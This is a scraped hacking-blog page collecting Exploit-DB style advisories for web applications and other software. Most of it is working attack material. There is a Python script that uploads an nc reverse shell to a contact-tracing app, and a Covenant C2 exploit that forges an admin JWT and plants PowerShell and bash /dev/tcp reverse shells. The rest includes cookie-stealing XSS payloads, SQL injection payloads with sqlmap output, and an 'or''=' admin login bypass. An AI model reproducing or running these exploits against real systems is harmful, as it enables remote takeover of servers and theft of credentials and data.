# Exploit Title: COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)
# Date: 19/05/2021
# Exploit Author: Rohit Burke
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10
==> Stored Cross-Site Scripting XSS:
An attacker uses Stored XSS to inject malicious content (referred to as
the payload), most often JavaScript code, into the target application. If
there is no input validation, this malicious code is permanently stored
(persisted) by the target application, for example within a database. For
example, an attacker may enter a malicious script into a user input field
such as a blog comment field or in a forum post.
When a victim opens the affected web page in a browser, the XSS attack
payload is served to the victim’s browser as part of the HTML code (just
like a legitimate comment would). This means that victims will end up
executing the malicious script once the page is viewed in their browser.
==> Attack Vendor:
This vulnerability can results attacker injecting the XSS payload in the
Admin profile section and each time admin visits the all other sections of
the application the XSS triggers and the attacker can able to steal the
cookie according to the crafted payload.
==> Vulnerable Parameters:
"Admin name" parameter
==> Steps for reproduce:
1) Go to http://localhost/covid-tms/login.php
and logged In as an Admin (#Username: admin #Password: Test@123).
2) Click on (Admin --> Profile). Enter the payload in
Admin name = <script>alert(1337)</script>
Click on submit.
3) Now, whichever section of the application admin visits the payload gets executed successfully.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147389
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)
# Date: 28-02-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14728/covid-19-contact-tracing-system-web-app-qr-code-scanning-using-php-source-code.html
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86
# --- Description --- #
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
# --- Proof of concept --- #
#!/usr/bin/python3
import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
def file_upload(target_ip, attacker_ip, attacker_port):
random_file_name = str(random.randint(100000, 999999)) + "revshell.php"
revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
m = MultipartEncoder(fields={'name': 'PWNED', 'img': (random_file_name, revshell_string, 'application/x-php')})
print("(+) Uploading php reverse shell..")
r1 = requests.post('http://{}/cts_qr/classes/SystemSettings.php?f=update_settings'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
if r1.text == '1':
print("(+) File upload seems to have been successful!")
return None
else:
print("(-) Oh no, the file upload seems to have failed!")
exit()
def trigger_shell(target_ip):
print("(+) Now trying to trigger our shell..")
#The file we uploaded previously is expected to be an image that the web app tries to embed into the login page.
#So by requesting the login page, our reverse shell php file will get triggered automatically. We dont even need to calculate the random bits of its new name.
r2 = requests.get('http://{}/cts_qr/login.php'.format(target_ip))
return None
def main():
if len(sys.argv) != 4:
print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
sys.exit(-1)
target_ip = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]
file_upload(target_ip, attacker_ip, attacker_port)
trigger_shell(target_ip)
print("\n(+) done!")
if __name__ == "__main__":
main()
# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)
# Exploit Author: xThaz
# Author website: https://xthaz.fr/
# Date: 2022-09-11
# Vendor Homepage: https://cobbr.io/Covenant.html
# Software Link: https://github.com/cobbr/Covenant
# Version: v0.1.3 - v0.5
# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker
# Vulnerability
## Discoverer: coastal
## Date: 2020-07-13
## Discoverer website: https://blog.null.farm
## References:
## - https://blog.null.farm/hunting-the-hunters
## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb
# !/usr/bin/env python3
# encoding: utf-8
import jwt # pip3 install PyJWT
import json
import warnings
import base64
import re
import random
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodome
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from requests import request # pip3 install requests
from subprocess import run
from pwn import remote, context # pip3 install pwntools
from os import remove, urandom
from shutil import which
from urllib.parse import urlparse
from pathlib import Path
from time import time
def check_requirements():
if which("mcs") is None:
print("Please install the mono framework in order to compile the payload.")
print("https://www.mono-project.com/download/stable/")
exit(-1)
def random_hex(length):
alphabet = "0123456789abcdef"
return ''.join(random.choice(alphabet) for _ in range(length))
def request_api(method, token, route, body=""):
warnings.simplefilter('ignore', InsecureRequestWarning)
return request(
method,
f"{args.target}/api/{route}",
json=body,
headers={
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
},
verify=False
)
def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):
secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'
payload_data = {
"sub": username,
"jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
"User",
"Administrator"
],
"exp": int(time()) + 360,
"iss": "Covenant",
"aud": "Covenant"
}
token = jwt.encode(payload_data, secret_key, algorithm='HS256')
return token
def get_id_admin(token, json_roles):
id_admin = ""
for role in json_roles:
if role["name"] == "Administrator":
id_admin = role["id"]
print(f"\t[*] Found the admin group id : {id_admin}")
break
else:
print("\t[!] Did not found admin group id, quitting !")
exit(-1)
id_admin_user = ""
json_users_roles = request_api("get", token, f"users/roles").json()
for user_role in json_users_roles:
if user_role["roleId"] == id_admin:
id_admin_user = user_role["userId"]
print(f"\t[*] Found the admin user id : {id_admin_user}")
break
else:
print("\t[!] Did not found admin id, quitting !")
exit(-1)
json_users = request_api("get", token, f"users").json()
for user in json_users:
if user["id"] == id_admin_user:
username_admin = user["userName"]
print(f"\t[*] Found the admin username : {username_admin}")
return username_admin, id_admin_user
else:
print("\t[!] Did not found admin username, quitting !")
exit(-1)
def compile_payload():
if args.os == "windows":
payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'
else:
payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'
dll = """using System;
using System.Reflection;
namespace ExampleDLL{
public class Class1{
public Class1(){
}
public void Main(string[] args){
System.Diagnostics.Process.Start(""" + payload + """);
}
}
}
"""
temp_dll_path = f"/tmp/{random_hex(8)}"
Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())
print(f"\t[*] Writing payload in {temp_dll_path}.cs")
compilo_path = which("mcs")
compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
if compilation.returncode:
print("\t[!] Error when compiling DLL, quitting !")
exit(-1)
print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")
dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()
remove(temp_dll_path + ".cs")
remove(temp_dll_path + ".dll")
print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
return dll_encoded
def generate_wrapper(dll_encoded):
wrapper = """public static class MessageTransform {
public static string Transform(byte[] bytes) {
try {
string assemblyBase64 = \"""" + dll_encoded + """\";
var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
var assembly = System.Reflection.Assembly.Load(assemblyBytes);
foreach (var type in assembly.GetTypes()) {
object instance = System.Activator.CreateInstance(type);
object[] args = new object[] { new string[] { \"\" } };
try {
type.GetMethod(\"Main\").Invoke(instance, args);
}
catch {}
}
}
catch {}
return System.Convert.ToBase64String(bytes);
}
public static byte[] Invert(string str) {
return System.Convert.FromBase64String(str);
}
}"""
return wrapper
def upload_profile(token, wrapper):
body = {
'httpUrls': [
'/en-us/index.html',
'/en-us/docs.html',
'/en-us/test.html'
],
'httpRequestHeaders': [
{'name': 'User-Agent',
'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
'Safari/537.36'},
{'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}
],
'httpResponseHeaders': [
{'name': 'Server', 'value': 'Microsoft-IIS/7.5'}
],
'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
'httpGetResponse': '{DATA}',
'httpPostResponse': '{DATA}',
'id': 0,
'name': random_hex(8),
'description': '',
'type': 'HTTP',
'messageTransform': wrapper
}
response = request_api("post", token, "profiles/http", body)
if not response.ok:
print("\t[!] Failed to create the listener profile, quitting !")
exit(-1)
else:
profile_id = response.json().get('id')
print(f"\t[*] Profile created with id {profile_id}")
print("\t[*] Successfully created the listener profile")
return profile_id
def generate_valid_listener_port(impersonate_token, tries=0):
if tries >= 10:
print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
exit(-1)
port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT
listeners = request_api("get", impersonate_token, "listeners").json()
port_used = []
for listener in listeners:
port_used.append(listener["bindPort"])
if port in port_used:
print(f"\t[!] Port {port} is already taken by another listener, retrying !")
generate_valid_listener_port(impersonate_token, tries + 1)
else:
print(f"\t[*] Port {port} seems free")
return port
def get_id_listener_type(impersonate_token, listener_name):
response = request_api("get", impersonate_token, "listeners/types")
if not response.ok:
print("\t[!] Failed to get the listener type, quitting !")
exit(-1)
else:
for listener_type in response.json():
if listener_type["name"] == listener_name:
print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')
return listener_type["id"]
def generate_listener(impersonate_token, profile_id):
listener_port = generate_valid_listener_port(impersonate_token)
listener_name = random_hex(8)
data = {
'useSSL': False,
'urls': [
f"http://0.0.0.0:{listener_port}"
],
'id': 0,
'name': listener_name,
'bindAddress': "0.0.0.0",
'bindPort': listener_port,
'connectAddresses': [
"0.0.0.0"
],
'connectPort': listener_port,
'profileId': profile_id,
'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),
'status': 'Active'
}
response = request_api("post", impersonate_token, "listeners/http", data)
if not response.ok:
print("\t[!] Failed to create the listener, quitting !")
exit(-1)
else:
print("\t[*] Successfully created the listener")
listener_id = response.json().get("id")
return listener_id, listener_port
def create_grunt(impersonate_token, data):
stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]
if stager_code == "":
stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]
if stager_code == "":
print("\t[!] Failed to create the grunt payload, quitting !")
exit(-1)
print("\t[*] Successfully created the grunt payload")
return stager_code
def get_grunt_config(impersonate_token, listener_id):
data = {
'id': 0,
'listenerId': listener_id,
'implantTemplateId': 1,
'name': 'Binary',
'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
'type': 'binary',
'dotNetVersion': 'Net35',
'runtimeIdentifier': 'win_x64',
'validateCert': True,
'useCertPinning': True,
'smbPipeName': 'string',
'delay': 0,
'jitterPercent': 0,
'connectAttempts': 0,
'launcherString': 'GruntHTTP.exe',
'outputKind': 'consoleApplication',
'compressStager': False
}
stager_code = create_grunt(impersonate_token, data)
aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
if not aes_key or not guid_prefix:
print("\t[!] Failed to retrieve the grunt configuration, quitting !")
exit(-1)
aes_key = aes_key.group(1)
guid_prefix = guid_prefix.group(1)
print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
return aes_key, guid_prefix
def aes256_cbc_encrypt(key, message):
iv_bytes = urandom(16)
key_decoded = base64.b64decode(key)
encoded_message = pad(message.encode(), 16)
cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)
encrypted = cipher.encrypt(encoded_message)
hmac = HMAC.new(key_decoded, digestmod=SHA256)
signature = hmac.update(encrypted).digest()
return encrypted, iv_bytes, signature
def trigger_exploit(listener_port, aes_key, guid):
message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
data = {
"GUID": guid,
"Type": 0,
"Meta": '',
"IV": base64.b64encode(iv).decode(),
"EncryptedMessage": base64.b64encode(ciphered).decode(),
"HMAC": base64.b64encode(signature).decode()
}
json_data = json.dumps(data).encode("utf-8")
payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"
if send_exploit(listener_port, "Cookie", guid, payload):
print("\t[*] Exploit succeeded, check listener")
else :
print("\t[!] Exploit failed, retrying")
if send_exploit(listener_port, "Cookies", guid, payload):
print("\t[*] Exploit succeeded, check listener")
else:
print("\t[!] Exploit failed, quitting")
def send_exploit(listener_port, header_cookie, guid, payload):
context.log_level = 'error'
request = f"""POST /en-us/test.html HTTP/1.1\r
Host: {IP_TARGET}:{listener_port}\r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: {len(payload)}\r
\r
{payload}
""".encode()
sock = remote(IP_TARGET, listener_port)
sock.sendline(request)
response = sock.recv().decode()
sock.close()
if "HTTP/1.1 200 OK" in response:
return True
else:
return False
if __name__ == "__main__":
check_requirements()
parser = argparse.ArgumentParser()
parser.add_argument("target",
help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")
parser.add_argument("os",
help="Operating System of the target",
choices=["windows", "linux"])
parser.add_argument("lhost",
help="IP of the machine that will receive the reverse shell")
parser.add_argument("lport",
help="Port of the machine that will receive the reverse shell")
args = parser.parse_args()
IP_TARGET = urlparse(args.target).hostname
print("[*] Getting the admin info")
sacrificial_token = craft_jwt("xThaz")
roles = request_api("get", sacrificial_token, "roles").json()
admin_username, admin_id = get_id_admin(sacrificial_token, roles)
impersonate_token = craft_jwt(admin_username, admin_id)
print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")
print("[*] Generating payload")
dll_encoded = compile_payload()
wrapper = generate_wrapper(dll_encoded)
print("[*] Uploading malicious listener profile")
profile_id = upload_profile(impersonate_token, wrapper)
print("[*] Generating listener")
listener_id, listener_port = generate_listener(impersonate_token, profile_id)
print("[*] Triggering the exploit")
aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")
# Exploit Title: CourseMS 2.1 - 'name' Stored XSS
# Date: 03/30/2021
# Exploit Author: cptsticky
# Vendor Homepage: http://sourceforge.net/projects/coursems
# Software Link: https://sourceforge.net/projects/coursems/files/latest/download
# Version: 2.1
# Tested on: Ubuntu 20.04
POST /coursems/admin/add_jobs.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/coursems/admin/add_jobs.php
Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Upgrade-Insecure-Requests: 1
name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title
Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS
source: https://www.securityfocus.com/bid/63435/info
Course Registration Management System is prone to multiple cross-site scripting and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
Course Registration Management System 2.2.1 is vulnerable; other versions may also be affected.
http://example.com/add_user.php (POST - params: work_tel, lastname, email, gmc_reg, job_title, firstname)
http://example.com/login.php (POST - params: username)
http://example.com/auth.php (POST - params: username)
http://example.com/forgotten_password.php
(POST - username)
username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
http://example.com/add_user.php
(POST - email)
email='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
http://example.com/login.php
(POST - username)
username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+
# # # # #
# Exploit Title: Courier Tracking Software v6.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/courier-tracking-software-ver-6
# Demo: http://courierv6.couriersoftwares.com/
# Version: 6.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/eaglecov6.php?c=other&f=show_news_details&view_id=[SQL]
# http://localhost/[PATH]/eaglecov6.php?c=homepage&f=services&ser_id=[SQL]
# user:username
# user:hub_name
# user:password
# user:hidden_pass
# user:entrydate
# user:onlinestatus
# user:status
# Etc...
# # # # #
# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page inburpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents
---
Parameter: ref_no (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND
'knst'='knst
---
# Exploit Title: Courier Management System 1.0 - 'MULTIPART street ' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page in burpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents
---
Parameter: MULTIPART street ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="id"
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="street"
11111111111' AND (SELECT 8687 FROM (SELECT(SLEEP(5)))XZFt) AND 'OQNu'='OQNu
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="city"
111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="state"
1111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="zip_code"
11111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="country"
1111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="contact"
111111111
-----------------------------12317926718649295872939507245--
---
# Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged in username on header and select Manage Account.
Step 3: Rename the user First Name or Last Name to
"<script>alert(1111)</script>".
Step 4: Update Profile and this will trigger the XSS.
Step 5: Logout and login again and the page will display the domain name.
# Title : Courier Management System - Sql Injection and non-persistent XSS login portal
# Date: 17 January 2017
# Exploit Author: Sibusiso Sishi sibusiso@ironsky.co.za
# Tested on: Windows7 x32
# Vendor: http://couriermanageme.sourceforge.net/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/couriermanageme/files/
#################################################
## About The Product : ##
Courier Management System is the simplest solution for Courier & Cargo Tracking Business. If you need to enable Tracking Option in your existing or new website, this is quickest Software Solution.You can get install it yourselves or We do the installation and brand it in your name on your hosting.The Courier Software is Very easy to setup and manage powerful administration. Provide online tracking system of consignment and shipping detail for International or domestic shipping
## Vulnerability : ##
The login portal is vulnerable to SQLi and cross-site scripting attacks
-HTTP Method : POST
POST /cms/login.php HTTP/1.1
Host: 192.168.19.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.19.135/cms/login.php
Cookie: PHPSESSID=q446r5fqav1qlljb7cohd29r85
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
txtusername=test&txtpassword=test&OfficeName=Fast+Courier+-+Jalgaon&Submit=Login+Now
- Sqlmap command: sqlmap -r exploit.txt
- Sqlmap Output :
sqlmap identified the following injection point(s) with a total of 824 HTTP(s) requests:
---
Parameter: txtpassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: txtusername=test&txtpassword=test' OR NOT 5887=5887#&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: txtusername=test&txtpassword=test' AND (SELECT 9962 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(9962=9962,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CqJl&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: txtusername=test&txtpassword=test' OR SLEEP(5)-- VMai&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Parameter: txtusername (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: txtusername=test' RLIKE (SELECT (CASE WHEN (9742=9742) THEN 0x74657374 ELSE 0x28 END))-- FJke&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: txtusername=test' AND (SELECT 6984 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(6984=6984,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nDYx&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: txtusername=test' AND (SELECT * FROM (SELECT(SLEEP(5)))Aols)-- LarG&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
---
[16:59:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.24
back-end DBMS: MySQL >= 5.0
# # # # #
# Vulnerability: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name: Courier Business Website Script
# Script Buy Now: http://scriptfirm.com/courier-business-website
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #
# # # # #
# Exploit Title: CouponPHP Script v3.1 - SQL Injection
# Google Dork: N/A
# Date: 27.03.2017
# Vendor Homepage: http://couponphp.com/
# Software: http://couponphp.com/demos
# Demo: http://newdemo2.couponphp.com
# Demo: http://newdemo3.couponphp.com
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/go.php?coupon_id=1&code=[SQL]
# users
# id
# username
# password
# # # # #
# # # # #
# Exploit Title: Country on Sale Script - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: http://www.websitescripts.org/
# Software: http://www.websitescripts.org/website-scripts/country-on-sale-script/prod_53.html
# Demo: http://www.websitescripts.org/demo/countryonsalescript/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/read_more.php?newsid=[SQL]
# http://localhost/[PATH]/countries/index.php?id=[SQL]
# 13'+/*!50000union*/+select+1,version(),0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,4,5--+-
# Etc..
# # # # #
############################################################################
# Exploit Title: Countly-server Stored(Persistent) XSS Vulnerability
# Date: Monday - 2018 13 August
# Author: 10:10AM Team
# Discovered By: Sleepy
# Software Link: https://github.com/Countly/countly-server
# Version: All Version
# Category: Web-apps
# Security Risk: Critical
# Tested on: GNU/Linux Ubuntu 16.04 - win 10
############################################################################
# Exploit:
# Description:
#
# Attacker can use multiple parameters in the provided link to inject his own data in the database
# of this application,the injected data can then be directly viewed in the event logs panel
# (manage>logger).
# Attacker may use this vulnerability to inject his own payload for attacks like Stored XSS.
# The injected payload will be executed everytime that the target page gets visited/refreshed.
#
# Proof of Concept:
#
# Injection URL:
#
# � http://[server_ip]:[api_port]/i?api_key=[api_key]¶meter_1=[payload_1]¶meter_2=[payload_2]&etc...
#
# Execution URL(login to server dashboard and navigate to "event logs" panel):
#
# � http://[server_ip]:[server_port]/dashboard#/[app_key]/manage/logger
#
#
############################################################################
# WE ARE: Sleepy({ssleeppyy@gmail.com}), Mikili({mikili.land@gmail.com})
############################################################################
# CVE-2019-15943
Counter-Strike Global Offensive (vphysics.dll) before 1.37.1.1 allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map using memory corruption.
### Description:
We are need modifying class name value in our PoC for triggering this vulnerability, offset for modifying in our PoC is `0x115703`. For example add char `"="` using this offset. PoC is "mc.bsp"
For modeling situation for attack we are need next:
First step is copy mc.bsp to `C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo\maps`;
Second step is start game with our map (mc.bsp), for this we are need turn on game console and insert in console: `map mc`.
After this steps we can see next:
I was use msec.dll (!exploitable) is a Windows debugging extension (Windbg) that provides automated crash analysis and security risk assessment [Download msec.dll](https://archive.codeplex.com/?p=msecdbg)
As you can see msec.dll checked this crash and decide that is EXPLOITABLE crash, because SEH chain is corrupted. It is means that attacker can use this vulnerability for remote code execution.
